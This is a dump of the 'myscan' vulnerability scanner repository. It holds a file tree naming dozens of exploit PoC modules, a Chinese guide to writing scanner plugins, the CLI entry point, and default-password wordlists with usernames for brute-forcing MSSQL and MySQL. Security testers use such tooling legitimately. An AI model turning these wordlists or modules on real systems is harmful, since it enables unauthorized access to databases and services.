├── .gitignore ├── LICENSE ├── README.md ├── docs ├── Class1-关于被动扫描器.md ├── Class2-进阶用法及开发指南.md ├── Class3-hostscan开发指南.md └── images │ ├── 1.png │ ├── 2.png │ ├── 3.png │ ├── 4.png │ ├── 5.png │ └── 流程图.png ├── myscan ├── TODO ├── __init__.py ├── __init__.pyc ├── cli.py ├── config.py ├── data │ ├── brute │ │ ├── mssql_pass │ │ ├── mssql_user │ │ ├── mysql_pass │ │ ├── mysql_user │ │ ├── password-top100.txt │ │ ├── redis_pass │ │ ├── smb_pass │ │ ├── smb_user │ │ ├── ssh_pass │ │ └── ssh_user │ ├── common │ │ └── dns_servers.txt │ └── dir │ │ └── dicc.txt ├── exp │ ├── dns │ │ └── dns_zone_transfer.py │ └── shiro │ │ └── shiro_find_key.py ├── htmllib │ ├── prism-http.min.js │ ├── prism-javascript.min.js │ ├── prism.min.css │ ├── prism.min.js │ └── raven.min.js ├── lib │ ├── __init__.py │ ├── __init__.pyc │ ├── bin │ │ └── weblogic │ │ │ ├── CVE-2020-14645.jar │ │ │ ├── CVE-2020-2555.jar │ │ │ └── CVE-2020-2883.jar │ ├── controller │ │ ├── __init__.py │ │ └── start.py │ ├── core │ │ ├── __init__.py │ │ ├── __init__.pyc │ │ ├── base.py │ │ ├── block_info.py │ │ ├── common.py │ │ ├── common_reverse.py │ │ ├── conn.py │ │ ├── const.py │ │ ├── data.py │ │ ├── datatype.py │ │ ├── dns.py │ │ ├── htmlout.py │ │ ├── log.py │ │ ├── options.py │ │ ├── plugin.py │ │ ├── pythonplugin.py │ │ ├── pythonpoc.py │ │ ├── register.py │ │ ├── status.py │ │ └── threads.py │ ├── helper │ │ ├── __init__.py │ │ ├── helper_socket.py │ │ ├── helper_sqli.py │ │ └── request.py │ ├── hostscan │ │ ├── __init__.py │ │ ├── common.py │ │ ├── input_sour │ │ │ ├── __init__.py │ │ │ ├── from_json_import.py │ │ │ ├── from_nmap_text_import.py │ │ │ └── from_nmap_xml_import.py │ │ ├── pocbase.py │ │ └── start_input.py │ ├── parse │ │ ├── __init__.py │ │ ├── cmd_line_parser.py │ │ ├── dictdata_parser.py │ │ └── response_parser.py │ ├── patch │ │ ├── ipv6_patch.py │ │ ├── paramiko_patch.py │ │ └── requests_urlencode_patch.py │ └── scriptlib │ │ ├── __init__.py │ │ ├── java │ │ └── java_serialize.py │ │ ├── sqli │ │ └── diffpage.py │ │ ├── ssti │ │ ├── __init__.py │ │ ├── closures.py │ │ ├── const.py │ │ ├── engines │ │ │ ├── __init__.py │ │ │ ├── dot.py │ │ │ ├── dust.py │ │ │ ├── ejs.py │ │ │ ├── erb.py │ │ │ ├── freemarker.py │ │ │ ├── jinja2.py │ │ │ ├── mako.py │ │ │ ├── marko.py │ │ │ ├── nunjucks.py │ │ │ ├── pug.py │ │ │ ├── slim.py │ │ │ ├── smarty.py │ │ │ ├── tornado.py │ │ │ ├── twig.py │ │ │ └── velocity.py │ │ ├── importssti.py │ │ ├── languages │ │ │ ├── bash.py │ │ │ ├── java.py │ │ │ ├── javascript.py │ │ │ ├── php.py │ │ │ ├── python.py │ │ │ └── ruby.py │ │ ├── plugin.py │ │ └── rand.py │ │ └── xss │ │ ├── __init__.py │ │ ├── common.py │ │ ├── const.py │ │ ├── generator.py │ │ ├── jsContexter.py │ │ └── utils.py ├── plugins │ ├── __init__.py │ ├── hostscan │ │ └── __init__.py │ └── webscan │ │ ├── __init__.py │ │ └── es_import.py ├── pocs │ ├── __init__.py │ ├── perfile │ │ ├── __template.py │ │ ├── myscan_crlf.py │ │ ├── myscan_dns_zone_transfer.py │ │ ├── myscan_editfile_leak.py │ │ ├── myscan_getpage.py │ │ ├── myscan_source_code_disclosure.py │ │ ├── myscan_webpack_leak.py │ │ ├── poc_bash-cve-2014-6271.py │ │ ├── poc_rails_cve-2019-5418_2019.py │ │ ├── poc_struts2-057.py │ │ ├── poc_struts2_016.py │ │ ├── poc_struts2_032.py │ │ └── poc_struts2_dev.py │ ├── perfolder │ │ ├── __init__.py │ │ ├── __poc_dedecms-cve-2018-6910_2018.py │ │ ├── __poc_dedecms-cve-2018-7700-rce_2018.py │ │ ├── __template.py │ │ ├── apache │ │ │ ├── __init__.py │ │ │ ├── poc_apache-flink-upload-rce_2020.py │ │ │ ├── poc_apache-ofbiz-cve-2018-8033-xxe_2018.py │ │ │ ├── poc_apache-ofbiz-cve-2020-9496-xml-deserialization_2020.py │ │ │ ├── poc_apache_nifi_rce_2020.py │ │ │ └── poc_apache_unomi_cve-2020-13942_2020.py │ │ ├── apereo │ │ │ ├── __init__.py │ │ │ └── poc_apereo_cas_rce_2019.py │ │ ├── axis │ │ │ ├── __init__.py │ │ │ └── poc_axis_cve-2019-0227_2019.py │ │ ├── baota │ │ │ ├── __init__.py │ │ │ └── poc_baota_pmaunauth_2020.py │ │ ├── basework │ │ │ ├── __init__.py │ │ │ └── myscan_getpage.py │ │ ├── bullwark │ │ │ └── poc_bullwark-momentum-lfi_2019.py │ │ ├── cacti │ │ │ ├── __init__.py │ │ │ └── poc_cacti-weathermap-file-write_2019.py │ │ ├── cisco │ │ │ ├── __init__.py │ │ │ ├── pcc_cisco_route_cve-2019-1653_2019.py │ │ │ ├── poc_cisco_asa_cve-2020-3452.py │ │ │ └── poc_cisco_xenmobile_cve-2020-8209_2020.py │ │ ├── citrix │ │ │ ├── __init__.py │ │ │ ├── poc_citrix-cve-2019-19781-path-traversal_2019.py │ │ │ ├── poc_citrix-cve-2020-8191-xss_2020.py │ │ │ ├── poc_citrix-cve-2020-8193-unauthorized.py │ │ │ └── poc_citrix-cve-2020-8982-unauth-fileread_2020.py │ │ ├── coldfusion │ │ │ ├── __init__.py │ │ │ └── poc_coldfusion-cve-2010-2861-lfi_2010.py │ │ ├── confluence │ │ │ ├── __init__.py │ │ │ └── poc_confluence-cve-2019-3396-lfi_2019.py │ │ ├── consul │ │ │ ├── __init__.py │ │ │ └── poc_consul-rce_2020.py │ │ ├── coremail │ │ │ ├── __init__.py │ │ │ └── poc_coremail-cnvd-2019-16798_2019.py │ │ ├── couchcms │ │ │ ├── __init__.py │ │ │ └── poc_couchcms-cve-2018-7662_2018.py │ │ ├── couchdb │ │ │ ├── __init__.py │ │ │ ├── poc_couchdb-cve-2017-12635_2017.py │ │ │ └── poc_couchdb-unauth_2016.py │ │ ├── dell │ │ │ └── poc_dell_idrac_weak_passwd_2020.py │ │ ├── discuz │ │ │ ├── __init__.py │ │ │ ├── poc_discuz-v72-sqli_2018.py │ │ │ ├── poc_discuz-wechat-plugins-unauth_2016.py │ │ │ └── poc_discuz-wooyun-2010-080723_2010.py │ │ ├── dlink │ │ │ ├── __init__.py │ │ │ ├── poc_dlink-850l-info-leak_2018.py │ │ │ ├── poc_dlink-cve-2019-16920-rce_2019.py │ │ │ └── poc_dlink-cve-2019-17506_2019.py │ │ ├── docker │ │ │ ├── __init__.py │ │ │ ├── poc_docker-api-unauthorized-rce_2017.py │ │ │ └── poc_docker-registry-api-unauth_2017.py │ │ ├── druid │ │ │ ├── __init__.py │ │ │ └── poc_druid-monitor-unauth_2019.py │ │ ├── drupal │ │ │ ├── __init__.py │ │ │ └── poc_drupal-cve-2019-6340_2019.py │ │ ├── ecology │ │ │ ├── __init__.py │ │ │ ├── poc_ecology-filedownload-directory-traversal_2018.py │ │ │ ├── poc_ecology-javabeanshell-rce_2019.py │ │ │ ├── poc_ecology-springframework-directory-traversal_2019.py │ │ │ ├── poc_ecology-syncuserinfo-sqli_2019.py │ │ │ ├── poc_ecology-validate-sqli_2019.py │ │ │ ├── poc_ecology-workflowcentertreedata-sqli_2019.py │ │ │ └── poc_ecology_db_leak_2020.py │ │ ├── ecshop │ │ │ ├── __init__.py │ │ │ └── poc_ecshop-360-rce_2019.py │ │ ├── elasticsearch │ │ │ ├── __init__.py │ │ │ ├── poc_elasticsearch-cve-2014-3120_2014.py │ │ │ ├── poc_elasticsearch-cve-2015-1427_2015.py │ │ │ ├── poc_elasticsearch-cve-2015-3337-lfi_2015.py │ │ │ └── poc_elasticsearch-unauth.py │ │ ├── exacqVision │ │ │ └── poc_exacqVision_cve-2020-9047_2020.py │ │ ├── f5 │ │ │ ├── __init__.py │ │ │ └── poc_f5-tmui-cve-2020-5902-rce_2020.py │ │ ├── finecms │ │ │ ├── __init__.py │ │ │ └── poc_finecms-sqli_2019.py │ │ ├── finereport │ │ │ ├── __init__.py │ │ │ └── poc_finereport-directory-traversal_2019.py │ │ ├── fortigate │ │ │ └── poc_fortigate_cve-2018-13379_2018.py │ │ ├── hadoop │ │ │ ├── __init__.py │ │ │ └── poc_hadoop_unauth_acc_2018.py │ │ ├── hikvision │ │ │ ├── __init__.py │ │ │ └── poc_hikvision_xss_2020.py │ │ ├── iis │ │ │ ├── __init__.py │ │ │ ├── poc_iis_6.0_cve-2017-7269.py │ │ │ └── poc_iis_6.0_shortname.py │ │ ├── info │ │ │ ├── __init__.py │ │ │ ├── myscan_baseline.py │ │ │ ├── myscan_dirscan.py │ │ │ ├── myscan_put_upload.py │ │ │ ├── myscan_sensitive_file_leak.py │ │ │ ├── poc_docker_registry_listing_2019.py │ │ │ ├── poc_front-page-misconfig.py │ │ │ ├── poc_jira_service-desk-signup.py │ │ │ ├── poc_jira_unauthenticated-projects.py │ │ │ ├── poc_springboot-actuators.py │ │ │ └── poc_webeditor_found.py │ │ ├── jboss │ │ │ ├── __init__.py │ │ │ └── poc_jboss_found_2020.py │ │ ├── jenkins │ │ │ └── poc_jenkins_rce_2019.py │ │ ├── jira │ │ │ ├── __init__.py │ │ │ ├── poc_jira-cve-2019-11581_2019.py │ │ │ ├── poc_jira-ssrf-cve-2019-8451_2019.py │ │ │ └── poc_jira_userenum_cve-2020-14181_2020.py │ │ ├── jolokia │ │ │ ├── __init__.py │ │ │ └── poc_jolokia_CVE-2018-1000130_2018.py │ │ ├── joomla │ │ │ ├── __init__.py │ │ │ ├── poc_joomla-cnvd-2019-34135-rce_2019.py │ │ │ └── poc_joomla-cve-2017-8917-sqli_2017.py │ │ ├── kibana │ │ │ └── poc_kibana-unauth_2018.py │ │ ├── kong │ │ │ ├── __init__.py │ │ │ └── poc_kong-cve-2020-11710-unauth_2020.py │ │ ├── kylin │ │ │ └── poc_kylin_cve-2020-13937_2020.py │ │ ├── lanproxy │ │ │ └── poc_lanproxy_fileread_2021.py │ │ ├── laravel │ │ │ ├── __init__.py │ │ │ └── poc_laravel-debug-info-leak_2020.py │ │ ├── myscan_redirect.py │ │ ├── myscan_swf_xss.py │ │ ├── nexus │ │ │ ├── __init__.py │ │ │ ├── poc_nexus-cve-2019-7238_2019.py │ │ │ └── poc_nexus-default-password_2020.py │ │ ├── nginx │ │ │ └── poc_nginx-module-vts-xss.py │ │ ├── nsfocus │ │ │ └── __nsfocus_uts_unauth_2020.py │ │ ├── oracle │ │ │ └── oracle_ebs-bispgrapgh-file-read_2020.py │ │ ├── phpstudy │ │ │ ├── __init__.py │ │ │ ├── poc_phpstudy-nginx-wrong-resolve_2020.py │ │ │ └── poc_phpstudy_backdoor_2019.py │ │ ├── poc_user-agent-shell-shock_2018.py │ │ ├── private │ │ │ └── __init__.py │ │ ├── pulsesecure │ │ │ └── poc_pulsesecure_sslvpn_cve-2019-11510_2019.py │ │ ├── qnap │ │ │ ├── __init__.py │ │ │ └── poc_qnap-cve-2019-7192_2019.py │ │ ├── rails │ │ │ ├── __init__.py │ │ │ └── poc_rails-cve-2018-3760_2018.py │ │ ├── saltstack │ │ │ └── poc_saltstack-cve-2020-16846_2020.py │ │ ├── sangfor │ │ │ ├── __init__.py │ │ │ ├── poc_sangfor_edr_rce_2020.py │ │ │ ├── poc_sangfor_edr_rce_202009_2020.py │ │ │ ├── poc_sangfor_edr_unauth_2020.py │ │ │ └── poc_sangfor_rce_2020.py │ │ ├── sap │ │ │ ├── __init__.py │ │ │ ├── poc_sap_cve-2017-12637_2017.py │ │ │ └── poc_sap_cve-2020-6287_2020.py │ │ ├── seeyon │ │ │ ├── __init__.py │ │ │ ├── poc_seeyon_u8_sqli_2020.py │ │ │ └── poc_seeyou_a8_getshell_2019.py │ │ ├── sharepoint │ │ │ └── poc_sharepoint_rce_cve-2020-1147_2020.py │ │ ├── solr │ │ │ ├── __init__.py │ │ │ ├── poc_solr-velocity-template-rce_2019.py │ │ │ ├── poc_solr_cve-2017-12629-xxe_2017.py │ │ │ └── poc_solr_cve-2019-0193_2019.py │ │ ├── sonarqube │ │ │ └── poc_sonarqube_api_access.py │ │ ├── spark │ │ │ ├── __init__.py │ │ │ └── poc_spark_unacc_2018.py │ │ ├── spring │ │ │ ├── __init__.py │ │ │ ├── poc_spring-cloud-cve-2020-5410_2020.py │ │ │ ├── poc_spring-cloud-netflix-hystrix-dashboard_CVE-2020-5412_2020.py │ │ │ ├── poc_spring_cloud-cve-2020-5405_2020.py │ │ │ ├── poc_spring_cve-2016-4977_2016.py │ │ │ ├── poc_spring_cve-2019-3799_2019.py │ │ │ ├── poc_spring_xss_2020.py │ │ │ ├── poc_springboot-actuators-jolokia-xxe.py │ │ │ └── poc_springboot_h2_db_rce_2020.py │ │ ├── struts │ │ │ ├── __init__.py │ │ │ ├── poc_struts2_033.py │ │ │ ├── poc_struts2_037.py │ │ │ ├── poc_struts2_045.py │ │ │ ├── poc_struts2_046.py │ │ │ └── poc_struts2_052.py │ │ ├── supervisord │ │ │ ├── __init__.py │ │ │ └── poc_supervisord-cve-2017-11610_2017.py │ │ ├── symantec │ │ │ └── poc_symantec-messaging-gateway_lfi_2020.py │ │ ├── terramaster │ │ │ ├── __init__.py │ │ │ └── poc_terramaster_rce_cve-2020-28188.py │ │ ├── thinkadmin │ │ │ └── poc_thinkadmin_unauth_and_read_file.py │ │ ├── thinkcmf │ │ │ ├── __init__.py │ │ │ ├── poc_thinkcmf-lfi_2020.py │ │ │ └── poc_thinkcmf_rce_2019.py │ │ ├── thinkphp │ │ │ ├── __init__.py │ │ │ └── poc_thinkphp_rce_all_2020.py │ │ ├── tomcat │ │ │ ├── __init__.py │ │ │ ├── poc_tomcat-manager-pathnormalization.py │ │ │ ├── poc_tomcat_cve-2017-12615_2017.py │ │ │ └── poc_tomcat_cve-2018-11759_2018.py │ │ ├── tongda │ │ │ ├── __init__.py │ │ │ ├── poc_tongda_oa_rce1_2020.py │ │ │ └── poc_tongda_oa_rce_2020.py │ │ ├── ueditor │ │ │ └── poc_ueditor_cnvd-2017-20077-file-upload_2020.py │ │ ├── vbulletin │ │ │ ├── poc_vbulletin-cve-2019-16759_2019.py │ │ │ └── poc_vbulletin-cve-2019-16759_2019_bypass.py │ │ ├── vmware │ │ │ └── poc_vmware_vcenter_readfile_2020.py │ │ ├── weaver │ │ │ └── poc_weaver-ebridge-file-read_2020.py │ │ ├── weblogic │ │ │ ├── __init__.py │ │ │ ├── poc_weblogic_cve-2017-10271_2017.py │ │ │ ├── poc_weblogic_cve-2019-2725_v10_2019.py │ │ │ ├── poc_weblogic_cve-2019-2725_v12_2019.py │ │ │ ├── poc_weblogic_cve-2019-2729_1_2019.py │ │ │ ├── poc_weblogic_cve-2019-2729_2_2019.py │ │ │ ├── poc_weblogic_cve-2020-14882_2020.py │ │ │ └── poc_weblogic_ssrf_2018.py │ │ ├── wordpress │ │ │ ├── __init__.py │ │ │ ├── poc_wordpress-duplicator-path-traversal.py │ │ │ ├── poc_wordpress_configfile.py │ │ │ └── poc_wordpress_wordfence_xss.py │ │ ├── xunchi │ │ │ └── poc_xunchi-cnvd-2020-23735-file-read_2020.py │ │ ├── xxl-job │ │ │ └── poc_xxl-job_unauth_rce_2020.py │ │ ├── yonyou │ │ │ └── poc_yonyou_rce_2020.py │ │ ├── youphptube │ │ │ └── poc_youphptube-encoder-cve-2019-5129_2019.py │ │ ├── zabbix │ │ │ ├── __init__.py │ │ │ ├── poc_zabbix_authentication-bypass_2016.py │ │ │ └── poc_zabbix_cve-2016-10134_2016.py │ │ ├── zeroshell │ │ │ ├── __init__.py │ │ │ └── poc_zeroshell_cve-2019-12725_2020.py │ │ └── zyxel │ │ │ └── poc_zyxel_cve-2020-9054_2020.py │ ├── perscheme │ │ ├── __init__.py │ │ ├── __myscan_analyze_serialize_parameter.py │ │ ├── __myscan_js_sensitive_content.py │ │ ├── __poc_fastjson_deserialization_rce_encode_2020.py │ │ ├── __poc_fastjson_rce.py │ │ ├── __template.py │ │ ├── info │ │ │ ├── __init__.py │ │ │ ├── myscan_baseline.py │ │ │ └── myscan_sensitive_msg_transfer.py │ │ ├── myscan_cmd_inject.py │ │ ├── myscan_cors.py │ │ ├── myscan_host_inject.py │ │ ├── myscan_jackson_cve-2019-12384_2019.py │ │ ├── myscan_jackson_cve-2020-35728.py │ │ ├── myscan_jsonp.py │ │ ├── myscan_phpcode_inject.py │ │ ├── myscan_phppath_leak.py │ │ ├── myscan_power_unauth.py │ │ ├── myscan_redirect.py │ │ ├── myscan_sqli_boolen.py │ │ ├── myscan_sqli_error.py │ │ ├── myscan_sqli_timeblind.py │ │ ├── myscan_ssrf.py │ │ ├── myscan_ssti.py │ │ ├── myscan_struts2_061.py │ │ ├── myscan_xss.py │ │ ├── myscan_xxe.py │ │ ├── others_fastjson_dnslog_found.py │ │ ├── others_jackson_fastjson_error_found.py │ │ ├── others_webdav.py │ │ ├── poc_apereo_cas_rce_2019.py │ │ ├── poc_fastjson_deserialization_rce_2020.py │ │ ├── poc_shiro_rce_2019.py │ │ ├── poc_srping_cve-2018-1273_2018.py │ │ ├── poc_struts2-053.py │ │ ├── poc_struts2_029.py │ │ ├── poc_struts2_048.py │ │ ├── shiro │ │ │ ├── __init__.py │ │ │ └── poc_shiro_rce_2019.py │ │ └── tomcat │ │ │ └── poc_tomcat-manager-pathnormalization_verify_2020.py │ ├── perserver │ │ ├── __init__.py │ │ ├── __ssh_brute.py │ │ ├── __template.py │ │ ├── mongodb_unauth.py │ │ ├── mssql_brute.py │ │ ├── mysql_brute.py │ │ ├── redis_brute.py │ │ ├── rmi_deserialization.py │ │ ├── samba_cve_2017-7494.py │ │ ├── smb_brute.py │ │ ├── smb_info.py │ │ ├── smb_ms17010.py │ │ ├── weblogic_cve_2020_14645.py │ │ ├── weblogic_cve_2020_2555.py │ │ └── weblogic_cve_2020_2883.py │ └── search.py ├── reverse │ ├── reverse.py │ ├── reverse_dns.py │ ├── reverse_http.py │ ├── reverse_ldap.py │ └── reverse_rmi.py ├── tests │ ├── TODO │ ├── __init__.py │ ├── codetest.py │ ├── es_test.py │ ├── getdatafromredis.py │ ├── ignore_test.py │ └── jnius_example.py └── web │ ├── app.py │ ├── static │ ├── bugs │ │ ├── bootstrap │ │ │ ├── css │ │ │ │ ├── bootstrap-theme.css │ │ │ │ ├── bootstrap-theme.css.map │ │ │ │ ├── bootstrap-theme.min.css │ │ │ │ ├── bootstrap.css │ │ │ │ ├── bootstrap.css.map │ │ │ │ └── bootstrap.min.css │ │ │ ├── fonts │ │ │ │ ├── glyphicons-halflings-regular.eot │ │ │ │ ├── glyphicons-halflings-regular.svg │ │ │ │ ├── glyphicons-halflings-regular.ttf │ │ │ │ ├── glyphicons-halflings-regular.woff │ │ │ │ └── glyphicons-halflings-regular.woff2 │ │ │ └── js │ │ │ │ ├── bootstrap.js │ │ │ │ ├── bootstrap.min.js │ │ │ │ └── npm.js │ │ ├── css │ │ │ └── style.css │ │ └── js │ │ │ ├── jquery-1.11.3.min.js │ │ │ ├── jquery-1.4.2.min.js │ │ │ └── jquery.twbsPagination.js │ ├── css │ │ └── prism.min.css │ ├── drops │ │ ├── css │ │ │ ├── 95e46879.main.css │ │ │ └── bootstrap.min.css │ │ └── js │ │ │ ├── bootstrap.min.js │ │ │ ├── jquery.js │ │ │ └── jquery.min.js │ └── js │ │ ├── prism-http.min.js │ │ ├── prism-javascript.min.js │ │ └── prism.min.js │ └── templates │ ├── base.html │ ├── error.html │ ├── index.html │ ├── index1.html │ ├── search.html │ └── search1.html ├── myscan_burp_extension.jar └── requirements.txt /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | .idea 3 | TODO 4 | tests/ 5 | __pycache__/ 6 | private/ 7 | codetest.py 8 | fuzz/ 9 | poc_thinkphp_logfile_2020.py 10 | -------------------------------------------------------------------------------- /docs/Class3-hostscan开发指南.md: -------------------------------------------------------------------------------- 1 | 此模块待开发... 2 | 3 | ### Example dict 4 | 5 | ``` 6 | { 7 | "filter": false, # redis是否去重 8 | "scan": false, # 是否再次用nmap确定服务,当为True时,service字段将无效 9 | "addr": "1.1.1.1", # 支持域名 10 | "port": 80, 11 | "type": "tcp", 12 | "service": { # nmap识别出来服务以及版本 13 | "smb": "6.1", 14 | "unknown": "" 15 | } 16 | } 17 | ``` 18 | 19 | 20 | ### POC编写 21 | 22 | 程序已有多种样例,可先阅读已编写好的代码。 23 | > 在pocs目录,共perfile,perfolder,perscheme三个目录,每个目录下均有__template.py文件,此文件为模版文件,编写poc时,复制一份重命名即可。 24 | > 25 | > 在POC文件里,类名必须为POC,必须包含一个self.result用来保存结果,和一个verify方法,如模板所示主要编写在verify方法里面pass部分。 26 | > 27 | > 建议使用内置的requests模块,具有统计失败次数,搜索功能。 28 | > 29 | > 成功的结果以dict数据保存在list类型self.result里,dict数据需按照如下格式来 30 | > 31 | > ``` 32 | self.result.append({ 33 | "name": self.name, 34 | "url": "http://example.com/test.php", 35 | "level": self.level, # 0:Low 1:Medium 2:High 36 | "detail": { 37 | "vulmsg": self.vulmsg, 38 | } 39 | }) 40 | >``` 41 | >dict数据必须包含"name","url","level","detail"四个key,其中detail字典里可自定义数据。 42 | > 43 | > 44 | 45 | -------------------------------------------------------------------------------- /docs/images/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/docs/images/1.png -------------------------------------------------------------------------------- /docs/images/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/docs/images/2.png -------------------------------------------------------------------------------- /docs/images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/docs/images/3.png -------------------------------------------------------------------------------- /docs/images/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/docs/images/4.png -------------------------------------------------------------------------------- /docs/images/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/docs/images/5.png -------------------------------------------------------------------------------- /docs/images/流程图.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/docs/images/流程图.png -------------------------------------------------------------------------------- /myscan/TODO: -------------------------------------------------------------------------------- 1 | 1.https://www.anquanke.com/post/id/184668 2 | 2.反序列化回显研究 3 | 3.cas插件编写 4 | 4.spring cve-2018-1273 回显 -------------------------------------------------------------------------------- /myscan/__init__.py: -------------------------------------------------------------------------------- 1 | __title__ = 'myscan' 2 | __version__ = '2.0.0' 3 | __author__ = 'caicai' 4 | __author_email__ = 'icaibai@foxmail.com' 5 | __license__ = 'GPL 2.0' 6 | __copyright__ = 'Copyright 2020' 7 | __name__ = 'myscan' 8 | __package__ = 'myscan' 9 | 10 | -------------------------------------------------------------------------------- /myscan/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/myscan/__init__.pyc -------------------------------------------------------------------------------- /myscan/cli.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020-02-14 3 | # @Author : caicai 4 | # @File : cli.py 5 | import os 6 | import sys 7 | 8 | try: 9 | import myscan 10 | except ImportError: 11 | sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir))) 12 | 13 | from myscan.lib.core.common import set_paths 14 | from myscan.lib.core.conn import set_conn, cleandb 15 | from myscan.lib.core.options import init_options 16 | from myscan.lib.controller.start import process_start, start 17 | from myscan.lib.core.status import start_count_status 18 | from myscan.lib.core.htmlout import start_write_results 19 | from myscan.lib.core.data import cmd_line_options, logger 20 | from myscan.reverse.reverse import reverse_start 21 | from myscan.lib.hostscan.start_input import start_input 22 | 23 | 24 | def main(): 25 | set_paths(os.path.dirname(os.path.realpath(__file__))) 26 | init_options() 27 | if cmd_line_options.command in ["webscan","hostscan"] : 28 | logger.info("Start {} mode".format(cmd_line_options.command)) 29 | set_conn() 30 | cleandb() 31 | start_count_status() 32 | start_write_results() 33 | start_input() 34 | process_start() 35 | start() 36 | elif cmd_line_options.command == "reverse": 37 | logger.info("Start reverse mode") 38 | reverse_start() 39 | 40 | if __name__ == '__main__': 41 | main() 42 | -------------------------------------------------------------------------------- /myscan/data/brute/mssql_pass: -------------------------------------------------------------------------------- 1 | sa 2 | sa@123 3 | Sa 4 | sa123 5 | 000000 6 | 000000000 7 | 0000000000 8 | 0000000000000000 9 | 0123456789 10 | 110120119 11 | 111111 12 | 111111111 13 | 1111111111 14 | 1111111111111111 15 | 123 16 | 123123 17 | 123123123 18 | 1233211234567 19 | 1234554321 20 | 123456 21 | 123456. 22 | 123456.. 23 | 123456789 24 | 123456789. 25 | 123456789.. 26 | 1234567890 27 | 12345678900 28 | 1234567891 29 | 12345678910 30 | 1234567891234567 31 | 1234567899 32 | 123456789a 33 | 123456789abc 34 | 123456789q 35 | 123456789qq 36 | 123456a 37 | 123456aa 38 | 123456abc 39 | 123456asd 40 | 123456q 41 | 123456qq 42 | 123698745 43 | 123abc 44 | 1314520520 45 | 135792468 46 | 1357924680 47 | 147258369 48 | 1472583690 49 | 19881230 50 | 1qaz2wsx 51 | 253013 52 | 5201314 53 | 5201314520 54 | 52013145201314 55 | 5841314520 56 | 741852963 57 | 7708801314520 58 | 789456123 59 | 7894561230 60 | 987654321 61 | 9876543210 62 | Passw0rd 63 | Password 64 | Password123 65 | Redis 66 | Redis123 67 | Redis@123 68 | Root@123 69 | a123123 70 | a123456 71 | a12345678 72 | a123456789 73 | a5201314 74 | aa123456 75 | aa123456789 76 | aaa123456 77 | abc123 78 | abc123456 79 | abc123456789 80 | abcd123 81 | abcd1234 82 | abcd123456 83 | admin 84 | admin123 85 | admin@123 86 | aini1314 87 | as123456 88 | asd123 89 | asd123456 90 | asdfghjkl 91 | foobared 92 | foobared123 93 | foobared123456 94 | foobared@123 95 | password123 96 | q123456 97 | q123456789 98 | qaz123456 99 | qazwsxedc 100 | qq123456 101 | qq123456789 102 | qq5201314 103 | qwe123 104 | qwe123456 105 | qwerty 106 | qwertyuiop 107 | redis 108 | redis123 109 | redis@123 110 | root 111 | root123 112 | root@123 113 | sunshine 114 | test 115 | test123 116 | w123456 117 | w123456789 118 | wang123456 119 | woaini 120 | woaini123 121 | !QAZ@WSX 122 | !QAZ2wsx 123 | woaini1314 124 | woaini1314520 125 | woaini520 126 | woaini521 127 | www123456 128 | z123456 129 | z123456789 130 | zxc123 131 | zxc123456 132 | zxcvbnm 133 | zxcvbnm123 -------------------------------------------------------------------------------- /myscan/data/brute/mssql_user: -------------------------------------------------------------------------------- 1 | sa -------------------------------------------------------------------------------- /myscan/data/brute/mysql_pass: -------------------------------------------------------------------------------- 1 | mysql 2 | Mysql 3 | mysql@123 4 | Mysql@123 5 | 000000 6 | 000000000 7 | 0000000000 8 | 0000000000000000 9 | 0123456789 10 | 110120119 11 | 111111 12 | 111111111 13 | 1111111111 14 | 1111111111111111 15 | 123 16 | 123123 17 | 123123123 18 | 1233211234567 19 | 1234554321 20 | 123456 21 | 123456. 22 | 123456.. 23 | 123456789 24 | 123456789. 25 | 123456789.. 26 | 1234567890 27 | 12345678900 28 | 1234567891 29 | 12345678910 30 | 1234567891234567 31 | 1234567899 32 | 123456789a 33 | 123456789abc 34 | 123456789q 35 | 123456789qq 36 | 123456a 37 | 123456aa 38 | 123456abc 39 | 123456asd 40 | 123456q 41 | 123456qq 42 | 123698745 43 | 123abc 44 | 1314520520 45 | 135792468 46 | 1357924680 47 | 147258369 48 | 1472583690 49 | 19881230 50 | 1qaz2wsx 51 | 253013 52 | 5201314 53 | 5201314520 54 | 52013145201314 55 | 5841314520 56 | 741852963 57 | 7708801314520 58 | 789456123 59 | 7894561230 60 | 987654321 61 | 9876543210 62 | Passw0rd 63 | Password 64 | Password123 65 | Redis 66 | Redis123 67 | Redis@123 68 | Root@123 69 | a123123 70 | a123456 71 | a12345678 72 | a123456789 73 | a5201314 74 | aa123456 75 | aa123456789 76 | aaa123456 77 | abc123 78 | abc123456 79 | abc123456789 80 | abcd123 81 | abcd1234 82 | abcd123456 83 | admin 84 | admin123 85 | admin@123 86 | aini1314 87 | as123456 88 | asd123 89 | asd123456 90 | asdfghjkl 91 | foobared 92 | foobared123 93 | foobared123456 94 | foobared@123 95 | password123 96 | q123456 97 | q123456789 98 | qaz123456 99 | qazwsxedc 100 | qq123456 101 | qq123456789 102 | qq5201314 103 | qwe123 104 | qwe123456 105 | qwerty 106 | qwertyuiop 107 | redis 108 | redis123 109 | redis@123 110 | root 111 | root123 112 | root@123 113 | sunshine 114 | test 115 | test123 116 | w123456 117 | w123456789 118 | wang123456 119 | woaini 120 | woaini123 121 | !QAZ@WSX 122 | !QAZ2wsx 123 | woaini1314 124 | woaini1314520 125 | woaini520 126 | woaini521 127 | www123456 128 | z123456 129 | z123456789 130 | zxc123 131 | zxc123456 132 | zxcvbnm 133 | zxcvbnm123 -------------------------------------------------------------------------------- /myscan/data/brute/mysql_user: -------------------------------------------------------------------------------- 1 | root 2 | mysql -------------------------------------------------------------------------------- /myscan/data/brute/password-top100.txt: 